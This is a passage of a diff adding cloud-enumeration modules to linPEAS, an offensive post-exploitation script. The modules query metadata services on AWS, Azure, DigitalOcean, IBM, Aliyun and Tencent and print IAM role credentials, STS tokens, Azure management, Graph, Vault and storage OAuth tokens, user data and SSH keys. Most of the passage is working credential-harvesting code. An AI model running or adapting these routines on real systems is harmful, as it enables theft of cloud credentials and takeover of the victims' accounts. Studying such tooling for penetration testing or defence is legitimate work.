      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
      echo "The addresses are in /codebuild/output/tmp/env.sh"
  fi
  if [ "$aws_req" ]; then
    print_3title "Credentials"
    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
    print_3title "Container Info"
    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
  fi
 fi
 if [ "$is_do" = "Yes" ]; then
  print_2title "DO Droplet Enumeration"
  do_req=""
  if [ "$(command -v curl)" ]; then
      do_req='curl -s -f '
  elif [ "$(command -v wget)" ]; then
      do_req='wget -q -O - '
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$do_req" ]; then
    URL="http://169.254.169.254/metadata"
    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
  fi
 fi
 if [ "$is_ibm_vm" = "Yes" ]; then
  print_2title "IBM Cloud Enumeration"
  if ! [ "$IBM_TOKEN" ]; then
    echo "Couldn't get the metdata token:("
  else
    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
    ACCEPT_HEADER="Accept: application/json"
    URL="http://169.254.169.254/latest/meta-data"
    ibm_req=""
    if [ "$(command -v curl)" ]; then
        ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
    elif [ "$(command -v wget)" ]; then
        ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$ibm_req" ]; then
      print_3title "Instance Details"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
      print_3title "Keys and User data"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
      print_3title "Placement Groups"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
      print_3title "IAM credentials"
      exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
    fi
  fi
 fi
 if [ "$is_az_vm" = "Yes" ]; then
  print_2title "Azure VM Enumeration"
  HEADER="Metadata:true"
  URL="http://169.254.169.254/metadata"
  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
  az_req=""
  if [ "$(command -v curl)" ]; then
      az_req="curl -s -f -H '$HEADER'"
  elif [ "$(command -v wget)" ]; then
      az_req="wget -q -O - -H '$HEADER'"
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$az_req" ]; then
    print_3title "Instance details"
    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
    print_3title "Load Balancer details"
    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
    print_3title "Management token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
    print_3title "Graph token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
    print_3title "Vault token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
    print_3title "Storage token"
    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
  fi
 fi
 if [ "$check_az_app" = "Yes" ]; then
  print_2title "Azure App Service Enumeration"
  echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
  HEADER="secret:$IDENTITY_HEADER"
  az_req=""
  if [ "$(command -v curl)" ]; then
      az_req="curl -s -f -H '$HEADER'"
  elif [ "$(command -v wget)" ]; then
      az_req="wget -q -O - -H '$HEADER'"
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$az_req" ]; then
    print_3title "Management token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
    print_3title "Graph token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
    print_3title "Vault token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
    print_3title "Storage token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/10_Azure_automation_account.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/10_Azure_automation_account.sh
@ -0,0 +1,46 @@
 # Title: Cloud - Azure Automation Account
 # ID: CL_Azure_automation_account
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Azure Automation Account Service Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_az_automation_acc, exec_with_jq, print_2title, print_3title
 # Global Variables: $is_az_automation_acc,
 # Initial Functions: check_az_automation_acc
 # Generated Global Variables: $API_VERSION, $HEADER, $az_req
 # Fat linpeas: 0
 # Small linpeas: 0
 API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
 if [ "$is_az_automation_acc" = "Yes" ]; then
  print_2title "Azure Automation Account Service Enumeration"
  HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
  az_req=""
  if [ "$(command -v curl || echo -n '')" ]; then
      az_req="curl -s -f -L -H '$HEADER'"
  elif [ "$(command -v wget || echo -n '')" ]; then
      az_req="wget -q -O - --header '$HEADER'"
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$az_req" ]; then
    print_3title "Management token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
    echo
    print_3title "Graph token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
    echo
    print_3title "Vault token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
    echo
    print_3title "Storage token"
    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/11_DO_Droplet.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/11_DO_Droplet.sh
@ -0,0 +1,42 @@
 # Title: Cloud - DO Droplet
 # ID: CL_DO_Droplet
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: DO Droplet Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_do, print_2title
 # Global Variables: $is_do
 # Initial Functions: check_do
 # Generated Global Variables: $do_req, $URL
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_do" = "Yes" ]; then
  print_2title "DO Droplet Enumeration"
  do_req=""
  if [ "$(command -v curl || echo -n '')" ]; then
      do_req='curl -s -f -L '
  elif [ "$(command -v wget || echo -n '')" ]; then
      do_req='wget -q -O - '
  else 
      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$do_req" ]; then
    URL="http://169.254.169.254/metadata"
    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/13_Ali_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/13_Ali_Cloud.sh
@ -0,0 +1,98 @@
 # Title: Cloud - Ali Cloud
 # ID: CL_Ali_Cloud
 # Author: Esonhugh
 # Last Update: 22-01-2024
 # Description: Ali Cloud Platform Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, print_info
 # Global Variables: $is_aliyun_ecs
 # Initial Functions: check_aliyun_ecs
 # Generated Global Variables: $aliyun_req, $aliyun_token, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_aliyun_owner_account, $i_region_id, $i_zone_id, $i_pub_ipv4, $i_priv_ipv4, $net_dns, $mac, $sa, $key
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_aliyun_ecs" = "Yes" ]; then
  aliyun_req=""
  aliyun_token=""
  if [ "$(command -v curl)" ]; then 
    aliyun_token=$(curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
    aliyun_req='curl -s -f -L -H "X-aliyun-ecs-metadata-token: $aliyun_token"'
  elif [ "$(command -v wget)" ]; then
    aliyun_token=$(wget -q -O - --method PUT "http://100.100.100.200/latest/api/token" --header "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
    aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"'
  else 
    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
  if [ "$aliyun_token" ]; then
    print_2title "Aliyun ECS Enumeration"
    print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata"
    echo ""
    print_3title "Instance Info"
    i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname)
    [ "$i_hostname" ] && echo "Hostname: $i_hostname"
    i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id)
    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
    # no dup of hostname if in ACK it possibly leaks aliyun cluster service ClusterId
    i_instance_name=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-name)
    [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
    i_instance_type=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-type)
    [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
    i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id)
    [ "$i_aliyun_owner_account" ] && echo "Aliyun Owner Account: $i_aliyun_owner_account"
    i_region_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/region-id)
    [ "$i_region_id" ] && echo "Region ID: $i_region_id"
    i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id)
    [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
    echo ""
    print_3title "Network Info"
    i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4)
    [ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4"
    i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4)
    [ "$i_priv_ipv4" ] && echo "Private IPv4: $i_priv_ipv4"
    net_dns=$(eval $aliyun_req  http://100.100.100.200/latest/meta-data/dns-conf/nameservers)
    [ "$net_dns" ] && echo "DNS: $net_dns"
    echo "========"
    for mac in $(eval $aliyun_req  http://100.100.100.200/latest/meta-data/network/interfaces/macs/); do
      echo "  Mac: $mac"
      echo "  Mac interface id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/network-interface-id)
      echo "  Mac netmask: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/netmask)
      echo "  Mac vpc id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-id)
      echo "  Mac vpc cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-cidr-block)
      echo "  Mac vpc cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-ipv6-cidr-blocks)
      echo "  Mac vswitch id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-id)
      echo "  Mac vswitch cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-cidr-block)
      echo "  Mac vswitch cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-ipv6-cidr-block)
      echo "  Mac private ips: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/private-ipv4s)
      echo "  Mac private ips (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6s)
      echo "  Mac gateway: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/gateway)
      echo "  Mac gateway (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6-gateway)
      echo "======="
    done
    echo ""
    print_3title "Service account "
    for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do 
      echo "  Name: $sa"
      echo "  STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa")
      echo "  =============="
    done
    echo ""
    print_3title "Possbile admin ssh Public keys"
    for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do
      echo "  Name: $key"
      echo "  Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key")
      echo "  =============="
    done
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/14_IBM_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/14_IBM_Cloud.sh
@ -0,0 +1,52 @@
 # Title: Cloud - IBM Cloud
 # ID: CL_IBM_Cloud
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: IBM Cloud Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_ibm_vm, print_2title, print_3title
 # Global Variables: $IBM_TOKEN, $is_ibm_vm
 # Initial Functions: check_ibm_vm
 # Generated Global Variables: $TOKEN_HEADER, $ACCEPT_HEADER, $URL, $ibm_req
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$is_ibm_vm" = "Yes" ]; then
  print_2title "IBM Cloud Enumeration"
  if ! [ "$IBM_TOKEN" ]; then
    echo "Couldn't get the metadata token:("
  else
    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
    ACCEPT_HEADER="Accept: application/json"
    URL="http://169.254.169.254/latest/meta-data"
    ibm_req=""
    if [ "$(command -v curl || echo -n '')" ]; then
        ibm_req="curl -s -f -L -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
    elif [ "$(command -v wget || echo -n '')" ]; then
        ibm_req="wget -q -O - --header '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$ibm_req" ]; then
      print_3title "Instance Details"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
      print_3title "Keys and User data"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
      print_3title "Placement Groups"
      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
      print_3title "IAM credentials"
      exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
    fi
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/15_Tencent_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/15_Tencent_Cloud.sh
@ -0,0 +1,88 @@
 # Title: Cloud - Tencent Cloud
 # ID: CL_Tencent_Cloud
 # Author: Shadowabi
 # Last Update: 22-01-2024
 # Description: Tencent Cloud Platform Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, print_info
 # Global Variables: $is_tencent_cvm
 # Initial Functions: check_tencent_cvm
 # Generated Global Variables: $tencent_req, $i_tencent_owner_account, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_region_id, $i_zone_id, $mac_tencent, $lipv4, $sa_tencent, $key_tencent
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_tencent_cvm" = "Yes" ]; then
  tencent_req=""
  if [ "$(command -v curl)" ]; then 
    tencent_req='curl --connect-timeout 2 -sfkG'
  elif [ "$(command -v wget)" ]; then
    tencent_req='wget -q --timeout 2 --tries 1  -O -'
  else 
    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
  fi
    print_2title "Tencent CVM Enumeration"
    print_info "https://cloud.tencent.com/document/product/213/4934"
    # Todo: print_info "Hacktricks Documents needs to be updated"
    echo ""
    print_3title "Instance Info"
    i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id)
    [ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account"
    i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname)
    [ "$i_hostname" ] && echo "Hostname: $i_hostname"
    i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-id)
    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
    i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid)
    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
    i_instance_name=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-name)
    [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
    i_instance_type=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance/instance-type)
    [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
    i_region_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/region)
    [ "$i_region_id" ] && echo "Region ID: $i_region_id"
    i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone)
    [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
    echo ""
    print_3title "Network Info"
    for mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do
      echo "  Mac: $mac_tencent"
      echo "  Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4)
      echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/public-ipv4s)
      echo "  Mac vpc id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/vpc-id)
      echo "  Mac subnet id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/subnet-id)
      for lipv4 in $(eval $tencent_req  http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s); do
        echo "  Mac local ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/local-ipv4)
        echo "  Mac gateways: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/gateway)
        echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4)
        echo "  Mac public ips mode: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4-mode)
        echo "  Mac subnet mask: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/subnet-mask)
      done
    echo "======="
    done
    echo ""
    print_3title "Service account "
    for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do 
      echo "  Name: $sa_tencent"
      echo "  STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent")
      echo "  =============="
    done
    echo ""
    print_3title "Possbile admin ssh Public keys"
    for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do
      echo "  Name: $key_tencent"
      echo "  Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key")
      echo "  =============="
    done
    echo ""
    print_3title "User Data"
    eval $tencent_req http://169.254.0.23/latest/user-data; echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/1_Check_if_in_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/1_Check_if_in_cloud.sh
@ -0,0 +1,34 @@
 # Title: Cloud - Check if in cloud
 # ID: CL_Check_if_in_cloud
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check if the current system is inside a cloud environment
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_az_automation_acc, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
 # Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_automation_acc, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
 # Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_az_automation_acc, check_aliyun_ecs, check_tencent_cvm
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 printf "${YELLOW}Learn and practice cloud hacking techniques in ${BLUE}https://training.hacktricks.xyz\n"$NC
 echo ""
 print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "GCP Cloud Funtion? ................... $is_gcp_function\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "Azure VM or Az metadata? ............. $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "Azure APP or IDENTITY_ENDPOINT? ...... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "Azure Automation Account? ............ $is_az_automation_acc\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 echo ""
--- a/linPEAS/builder/linpeas_parts/3_cloud/2_AWS_EC2.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/2_AWS_EC2.sh
@ -0,0 +1,85 @@
 # Title: Cloud - AWS EC2
 # ID: CL_AWS_EC2
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: AWS EC2 Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_aws_ec2, exec_with_jq, print_2title, print_3title
 # Global Variables: $is_aws_ec2
 # Initial Functions: check_aws_ec2
 # Generated Global Variables: $aws_req, $HEADER, $URL, $mac, $role, $TOKEN, $TOKEN_HEADER, $TOKEN_TTL
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$is_aws_ec2" = "Yes" ]; then
    print_2title "AWS EC2 Enumeration"
    TOKEN=""
    TOKEN_HEADER="X-aws-ec2-metadata-token"
    TOKEN_TTL="X-aws-ec2-metadata-token-ttl-seconds: 21600"
    URL="http://169.254.169.254/latest/meta-data"
    aws_req=""
    if [ "$(command -v curl || echo -n '')" ]; then
        # Get token for IMDSv2
        TOKEN=$(curl -s -f -X PUT "http://169.254.169.254/latest/api/token" -H "$TOKEN_TTL" 2>/dev/null)
        aws_req="curl -s -f -L -H '$TOKEN_HEADER: $TOKEN'"
    elif [ "$(command -v wget || echo -n '')" ]; then
        # Get token for IMDSv2
        TOKEN=$(wget -q -O - --method=PUT --header="$TOKEN_TTL" "http://169.254.169.254/latest/api/token" 2>/dev/null)
        aws_req="wget -q -O - --header '$TOKEN_HEADER: $TOKEN'"
    else 
        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
    fi
    if [ "$aws_req" ]; then
        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
        echo ""
        print_3title "Account Info"
        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
        echo ""
        print_3title "Network Info"
        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
          echo "Mac: $mac"
          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
          echo ""
        done
        echo ""
        print_3title "IAM Role"
        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
          echo "Role: $role"
          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
          echo ""
        done
        echo ""
        print_3title "User Data"
        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
        echo ""
        print_3title "EC2 Security Credentials"
        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
        print_3title "SSM Runnig"
        ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED},"
    fi
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/3_AWS_ECS.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/3_AWS_ECS.sh
@ -0,0 +1,48 @@
 # Title: Cloud - AWS ECS
 # ID: CL_AWS_ECS
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: AWS ECS Enumeration
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_aws_ecs, exec_with_jq, print_2title, print_3title
